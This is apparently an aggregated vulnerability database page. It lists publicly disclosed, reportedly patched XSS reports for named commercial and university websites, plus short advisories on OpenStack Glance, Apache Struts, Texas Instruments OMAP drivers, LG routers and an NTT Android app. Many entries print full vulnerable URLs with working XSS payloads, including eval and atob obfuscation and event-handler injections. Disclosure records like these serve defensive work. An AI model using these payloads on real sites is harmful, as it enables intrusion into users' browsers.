Softbank, NTT Docomo, KDDI Security Vulnerabilities
7.1AI Score
-0.2AI Score
zennioptical.com XSS vulnerability
Vulnerable URL: http://www.zennioptical.com/eyeglasses?Ntt=435345"-prompt(/XSSPOSED/)-"&_requestid=5834596 Details: Description| Value ---|--- Patched:| Yes, at 24.03.2017 Latest check for patch:| 24.03.2017 18:58 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank|...
6.3AI Score
search.library.duke.edu XSS vulnerability
Vulnerable URL: http://search.library.duke.edu/search?Ntt='>&Ntk;=Keyword&sugg;=&local-filter;=TRUE&affiliation;=Duke Details: Description| Value ---|--- Patched:| Yes, at 04.09.2015 Latest check for patch:| 04.09.2015 01:25 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed....
6.3AI Score
3mdeutschland.de XSS vulnerability
Vulnerable URL: http://www.3mdeutschland.de/3M/de_DE/unternehmen-de/produkte/?N=5002385+8711017&Ntt;=%3Csvg%20onload%3Dalert%28%2fXSSPOSED%2f%29%3E&LC;=de_DE&co;=cc&gsaAction;=scBR&rt;=rs Details: Description| Value ---|--- Patched:| Yes, at 25.07.2017 Latest check for patch:| 25.07.2017 13:29...
6.3AI Score
media.topshop.com XSS vulnerability
Open Bug Bounty ID: OBB-76697 Description| Value ---|--- Affected Website:| media.topshop.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1...
6.3AI Score
mobile.topshop.com XSS vulnerability
Vulnerable URL: http://mobile.topshop.com/webapp/wcs/stores/servlet/CatalogNavigationSearchResultCmd?langId=-1&storeId;=13058&catalogId;=34058&Dy;=1&Nty;=1&beginIndex;=1&pageSize;=20&Nrpp;=20&pageNum;=1&Ntt;="-eval("al"%2b"e"%2b"rt("xssposed")")()-"&geoip;=noredirect Details: Description|...
6.3AI Score
th.topshop.com XSS vulnerability
Vulnerable URL: http://th.topshop.com/webapp/wcs/stores/servlet/CatalogNavigationSearchResultCmd?langId=-1&storeId;=13058&catalogId;=34058&Dy;=1&Nty;=1&beginIndex;=1&pageSize;=20&Nrpp;=20&pageNum;=1&Ntt;="-eval("al"%2b"e"%2b"rt("xssposed")")()-"&geoip;=noredirect Details: Description| Val...
6.3AI Score
my.topshop.com XSS vulnerability
Vulnerable URL: http://my.topshop.com/webapp/wcs/stores/servlet/CatalogNavigationSearchResultCmd?langId=-1&storeId;=13058&catalogId;=34058&Dy;=1&Nty;=1&beginIndex;=1&pageSize;=20&Nrpp;=20&pageNum;=1&Ntt;=%22-eval%28%22al%22%2b%22e%22%2b%22rt%28%22xssposed%22%29%22%29%28%29-%22&geoip;=noredirect ...
6.3AI Score
fr.topshop.com XSS vulnerability
Vulnerable URL: http://fr.topshop.com/webapp/wcs/stores/servlet/CatalogNavigationSearchResultCmd?langId=-1&storeId;=13058&catalogId;=34058&Dy;=1&Nty;=1&beginIndex;=1&pageSize;=20&Nrpp;=20&pageNum;=1&Ntt;="-eval("al"%2b"e"%2b"rt("xssposed")")()-"&geoip;=noredirect Details: Description| Val...
6.3AI Score
us.topshop.com XSS vulnerability
Vulnerable URL: http://us.topshop.com/webapp/wcs/stores/servlet/CatalogNavigationSearchResultCmd?langId=-1&storeId;=13058&catalogId;=34058&Dy;=1&Nty;=1&beginIndex;=1&pageSize;=20&Nrpp;=20&pageNum;=1&Ntt;=%22-eval%28%22al%22%2b%22e%22%2b%22rt%28%22xssposed%22%29%22%29%28%29-%22&geoip;=noredirect ...
6.3AI Score
Vulnerable URL: http://www.verizon.com/search/SearchResults?Dy=1&Nty;=1&Ntt;=&ES;=ResidentialShop Details: Description| Value ---|--- Patched:| Yes, at 08.09.2015 Latest check for patch:| 08.09.2015 01:23 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 589...
6.3AI Score
Vulnerable URL: http://www.hasbro.com/littlestpetshop/en_US/search/_/Ntt-%27%22%5Ealert%28%22xssposed%22%29%5E%22+?Ntk=All&Ntx;=mode+matchallpartial Details: Description| Value ---|--- Patched:| Yes, at 31.08.2015 Latest check for patch:| 31.08.2015 18:39 GMT Vulnerability type:| XSS...
6.3AI Score
verizonwireless.com XSS vulnerability
Vulnerable URL: http://www.verizonwireless.com/search/vzwSearch?Ntt=lol">&nav;=Global&gTab;=undefined Details: Description| Value ---|--- Patched:| Yes, at 01.09.2015 Latest check for patch:| 01.09.2015 01:33 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 370....
6.3AI Score
sheetmusicplus.com XSS vulnerability
Vulnerable URL: http://www.sheetmusicplus.com/search?Ntt=%27%22%3E%3Caudio%20onloadstart%3dalert%28%27xssposed%27%29%20src%3E// Details: Description| Value ---|--- Patched:| Yes, at 22.11.2017 Latest check for patch:| 22.11.2017 09:39 GMT Vulnerability type:| XSS Vulnerability status:| Publicly...
6.3AI Score
careerage.com XSS vulnerability
Vulnerable URL: http://www.careerage.com/search?field=ntt%27-alert%28/xssposed/%29-%27&location;=%22Himachal%20Pradesh%22&DAYS;=30&resultsby;=date Details: Description| Value ---|--- Patched:| Yes, at 28.07.2015 Latest check for patch:| 28.07.2015 00:55 GMT Vulnerability type:| XSS Vulnerability...
6.3AI Score
Vulnerable URL: http://www.ncl.com/search?N=4294963116&Ne;=8116&Ns;=p_Page_Is_Featured|1||p_Page_Content_Type_Weight|1&Ntt;=Search+the+entire+site+for...%27%22%3E%3Csvg/onload=prompt%28/xssposed/%29%3EΝ=p_Page_URL&Search;_submit= Details: Description| Value ---|--- Patched:| Yes, at 18.02.2016...
6.3AI Score
Vulnerable URL: http://www.talbots.com/online/browse/_/Ntt-"><img src%3dx onerror="prompt('xssposed') </pre> ##### Details: Description| Value ---|--- Patched:| Yes, at 25.07.2017 Latest check for patch:| 25.07.2017 12:55 GMT Vulnerability type:| XSS Vulnerability status:| Publicly...
6.3AI Score
oakexpress.furniturerow.com XSS vulnerability
Vulnerable URL: http://oakexpress.furniturerow.com/catalog/category/category.jsp?Ntt=%27%22%3E%3Caudio%20onloadstart%3dalert%28%27xssposed%27%29%20src%3E//&Ntk;=All Details: Description| Value ---|--- Patched:| Yes, at 30.01.2016 Latest check for patch:| 30.01.2016 21:28 GMT Vulnerability type:|...
6.3AI Score
furniturerow.com XSS vulnerability
Vulnerable URL: http://www.furniturerow.com/shared/catalog/search/searchresults.jsp?Ntk=All&Nrpp;=18&Ntt;=Full+Mattress%27%22%3E%3Caudio%20onloadstart%3dalert%28%27xssposed%27%29%20src%3E// Details: Description| Value ---|--- Patched:| Yes, at 14.08.2015 Latest check for patch:| 14.08.2015 01:39...
6.3AI Score
denvermattress.furniturerow.com XSS vulnerability
Vulnerable URL: http://denvermattress.furniturerow.com/shared/catalog/search/searchresults.jsp?Ntk=All&Nrpp;=18&Ntt;=Full+Mattress%27%22%3E%3Caudio%20onloadstart%3dalert%28%27xssposed%27%29%20src%3E// Details: Description| Value ---|--- Patched:| Yes, at 30.01.2016 Latest check for patch:|...
6.3AI Score
Vulnerable URL: http://ae.com/web/search/index.jsp?Ntt=sunglasses%27%22%3E%3Caudio%20onloadstart%3dalert%28%27xssposed%27%29%20src%3E// Details: Description| Value ---|--- Patched:| Yes, at 04.09.2015 Latest check for patch:| 04.09.2015 16:06 GMT Vulnerability type:| XSS Vulnerability status:|...
6.3AI Score
Vulnerable URL: http://www.cusp.com/search.jsp?N=0&from;=saledi&st;=s&rd;=1&Ntt;=123";%0d%0a[]["filter"]"constructor" ();// Details: Description| Value ---|--- Patched:| Yes, at 30.01.2016 Latest check for patch:| 30.01.2016 21:18 GMT Vulnerability type:| XSS...
6.3AI Score
virtualreferencelibrary.ca XSS vulnerability
Vulnerable URL: http://www.virtualreferencelibrary.ca/search.jsp?DC_Subject=Toronto&N;=38537+37911&Ntt;=">&Ntx;=mode+matchBoolean&searchPageType;=vrl&view;=grid&Erp;=20 Details: Description| Value ---|--- Patched:| Yes, at 07.08.2015 Latest check for patch:| 07.08.2015 01:25 GMT Vulnerability...
6.3AI Score
neimanmarcus.com XSS vulnerability
Vulnerable URL: https://www.neimanmarcus.com/en-nl/search.jsp?N=0&from;=saledi&st;=s&rd;=1&Ntt;=Ash";%0d%0a[]["filter"]"constructor" ();// Details: Description| Value ---|--- Patched:| Yes, at 30.01.2016 Latest check for patch:| 30.01.2016 21:18 GMT...
6.3AI Score
lastcall.com XSS vulnerability
Vulnerable URL: http://www.lastcall.com/search.jsp?Ntt=*/%22-%5B%5D%5B%22filter%22%5D%5B%22constructor%22%5D%28%20atob%28%22YWxlcnQoL3hzc3Bvc2VkLyk=%22%29%20%29%28%29;//Ash&N;=0 Details: Description| Value ---|--- Patched:| Yes, at 30.01.2016 Latest check for patch:| 30.01.2016 21:18 GMT...
6.3AI Score
biggestbook.com XSS vulnerability
Vulnerable URL: http://www.biggestbook.com/search.jsp?searchType=null&Ns;=ITEM_LIST|1&originalSearch;='">&N;=0&Ntt;= Details: Description| Value ---|--- Patched:| Yes, at 25.07.2017 Latest check for patch:| 25.07.2017 12:40 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed.....
6.3AI Score
Vulnerable URL: http://www.mouser.com/search/refine.aspx?Ntt=tl074'-alert('xssposed')-' Details: Description| Value ---|--- Patched:| Yes, at 15.07.2016 Latest check for patch:| 15.07.2016 16:33 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 5743 Google...
6.3AI Score
Vulnerable URL: http://www.hasbro.com/mylittlepony/en_US/search/_/Ntt-%22-alert%28%27xssposed%27%29-%22+?Ntk=All&Ntx;=mode+matchallpartial Details: Description| Value ---|--- Patched:| Yes, at 27.07.2015 Latest check for patch:| 27.07.2015 22:52 GMT Vulnerability type:| XSS Vulnerability status:|.....
6.3AI Score
Vulnerable URL: http://www.horchow.com/search.jsp?N=0&Ntt;=123";%0d%0a[]["filter"]"constructor" ();//&_requestid=32674 Details: Description| Value ---|--- Patched:| Yes, at 30.01.2016 Latest check for patch:| 30.01.2016 21:18 GMT Vulnerability type:| XSS...
6.3AI Score
eu.mouser.com XSS vulnerability
Vulnerable URL: http://eu.mouser.com/search/refine.aspx?Ntt=tl074'-alert('xssposed')-' Details: Description| Value ---|--- Patched:| Yes, at 20.05.2016 Latest check for patch:| 20.05.2016 18:52 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not...
6.3AI Score
Vulnerable URL: https://www.nyse.com/search?q=ntt&site;=IntercontinentalExchange|NYSE|instruments|theICE|theICEProductGuide|theICEReports&client;=nyse_frontend_html%27-alert%28/xssposed/%29-%27&proxystylesheet;=nyse_frontend_html&output;=xml_no_dtd&filter;=0 Details: Description| Value ---|---...
6.3AI Score
teleflora.com XSS vulnerability
Vulnerable URL: http://www.teleflora.com/browse?_dyncharset=UTF-8&_dynSessConf=3615797737721928070&Ntt;=&search;=&_D:search=+&_DARGS=/cartridges/SearchBox/SearchBox.jsp.searchForm%27-alert%28/xssposed/%29-%27 Details: Description| Value ---|--- Patched:| Yes, at 30.01.2016 Latest check for...
6.3AI Score
teleflora.com XSS vulnerability
Vulnerable URL: http://www.teleflora.com/browse;jsessionid=822279990F21340891C0770351A23BE0?_dyncharset=UTF-8&_dynSessConf=3615797737721928070&Ntt;=123%27-alert%28/xssposed/%29-%27&search;=&_D:search=+&_DARGS=/cartridges/SearchBox/SearchBox.jsp.searchForm Details: Description| Value ---|---...
6.3AI Score
teleflora.com XSS vulnerability
Vulnerable URL: http://www.teleflora.com/browse;jsessionid=822279990F21340891C0770351A23BE0?_dyncharset=UTF-8&_dynSessConf=3615797737721928070&Ntt;=123&search;=%27-alert%28/xssposed/%29-%27&_D:search=+&_DARGS=/cartridges/SearchBox/SearchBox.jsp.searchForm Details: Description| Value ---|---...
6.3AI Score
teleflora.com XSS vulnerability
Vulnerable URL: http://www.teleflora.com/browse;jsessionid=822279990F21340891C0770351A23BE0?_dyncharset=UTF-8&_dynSessConf=3615797737721928070&Ntt;=123&search;=&_D:search=+%27-alert%28/xssposed/%29-%27&_DARGS=/cartridges/SearchBox/SearchBox.jsp.searchForm Details: Description| Value ---|---...
6.3AI Score
search.time.com XSS vulnerability
Vulnerable URL: http://search.time.com/results.html?Ntt=xssposed&N;=0%22%27--%3E%3CsCripT%3Ealert(%27XSSPOSED%27)%3C/script%3E&Nty;=1 Details: Description| Value ---|--- Patched:| Yes, at 25.07.2017 Latest check for patch:| 25.07.2017 12:11 GMT Vulnerability type:| XSS Vulnerability status:|...
6.3AI Score
Open Bug Bounty ID: OBB-66364 Description| Value ---|--- Affected Website:| ohsu.edu Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79 CVSSv3 Score:| 6.1...
6.3AI Score
creativity-online.com XSS vulnerability
Vulnerable URL: http://creativity-online.com/search.php?D=%3E%3C/title%3E%3Cscript%3Ealert%28KCF%29%3C/script%3E%27%22%3E%3Cmarquee%3E%3Ch1%3Etest%3C/h1%3E%3C/marquee%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E&Nty;=1&Ntk;=CreativityAll&Ns;=P_Air_Date|1&Ne;=47&N;=26+36&Ntt;=AT Details: Description|.....
6.3AI Score
(RHSA-2015:0838) Low: openstack-glance security and bug fix update
OpenStack Image service (glance) provides discovery, registration, and delivery services for disk and server images. It provides the ability to copy or snapshot a server image, and immediately store it away. Stored images can be used as a template to get new servers up and running quickly and more....
6.4AI Score
0.023EPSS
(RHSA-2015:0837) Low: openstack-glance security and bug fix update
OpenStack Image service (glance) provides discovery, registration, and delivery services for disk and server images. It provides the ability to copy or snapshot a server image, and immediately store it away. Stored images can be used as a template to get new servers up and running quickly and more....
6.4AI Score
0.023EPSS
The Validator in Apache Struts 1.1 and later contains a function (MPV -- Multi Page Validator) to efficiently define rules for input validation across multiple pages during screen transitions. The MPV contains a vulnerability where input validation may be bypassed. When the Apache Struts 1...
7.5CVSS
7.5AI Score
0.949EPSS
(RHSA-2015:0644) Low: openstack-glance security and bug fix update
OpenStack Image service (glance) provides discovery, registration, and delivery services for disk and server images. It provides the ability to copy or snapshot a server image, and immediately store it away. Stored images can be used as a template to get new servers up and running quickly and more....
6.4AI Score
0.023EPSS
Multiple unspecified vulnerabilities in the Syslink driver for Texas Instruments OMAP mobile processor, as used on NTT DOCOMO ARROWS Tab LTE F-01D, ARROWS X LTE F-05D, Disney Mobile on docomo F-08D, REGZA Phone T-01D, and PRADA phone by LG L-02D; and SoftBank SHARP handsets 102SH allow local users....
7.5AI Score
0.0004EPSS
Multiple unspecified vulnerabilities in the Syslink driver for Texas Instruments OMAP mobile processor, as used on NTT DOCOMO ARROWS Tab LTE F-01D, ARROWS X LTE F-05D, Disney Mobile on docomo F-08D, REGZA Phone T-01D, and PRADA phone by LG L-02D; and SoftBank SHARP handsets 102SH allow local users....
7.3AI Score
0.0004EPSS
Multiple unspecified vulnerabilities in the Syslink driver for Texas Instruments OMAP mobile processor, as used on NTT DOCOMO ARROWS Tab LTE F-01D, ARROWS X LTE F-05D, Disney Mobile on docomo F-08D, REGZA Phone T-01D, and PRADA phone by LG L-02D; and SoftBank SHARP handsets 102SH allow local users....
7.8AI Score
0.0004EPSS
Multiple unspecified vulnerabilities in the Syslink driver for Texas Instruments OMAP mobile processor, as used on NTT DOCOMO ARROWS Tab LTE F-01D, ARROWS X LTE F-05D, Disney Mobile on docomo F-08D, REGZA Phone T-01D, and PRADA phone by LG L-02D; and SoftBank SHARP handsets 102SH allow local users....
7.3AI Score
0.0004EPSS
JVN#71762315: LG Electronics mobile access routers lack access restrictions
LG Electronics mobile access routers provided by NTT DOCOMO, INC. lack access restrictions in the web administration interface. ## Impact An attacker that can access the device may bypass authentication and obtain information stored on the device. ## Solution Apply an Update Apply the update...
6.4AI Score
0.003EPSS
docomo-game.com XSS vulnerability
Vulnerable URL: http://docomo-game.com/igame.php?jya=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%28String.fromCharCode%2888,%2083,%2083,%2080,%2079,%2083,%2069,%2068%29%29%3C/script%3E Details: Description| Value ---|--- Patched:| Yes, at 21.11.2017 Latest check for patch:| 21.11.2017...
6.3AI Score
The NTT 050 plus application before 4.2.1 for Android allows attackers to obtain sensitive information by leveraging the ability to read system log...
6.1AI Score
0.002EPSS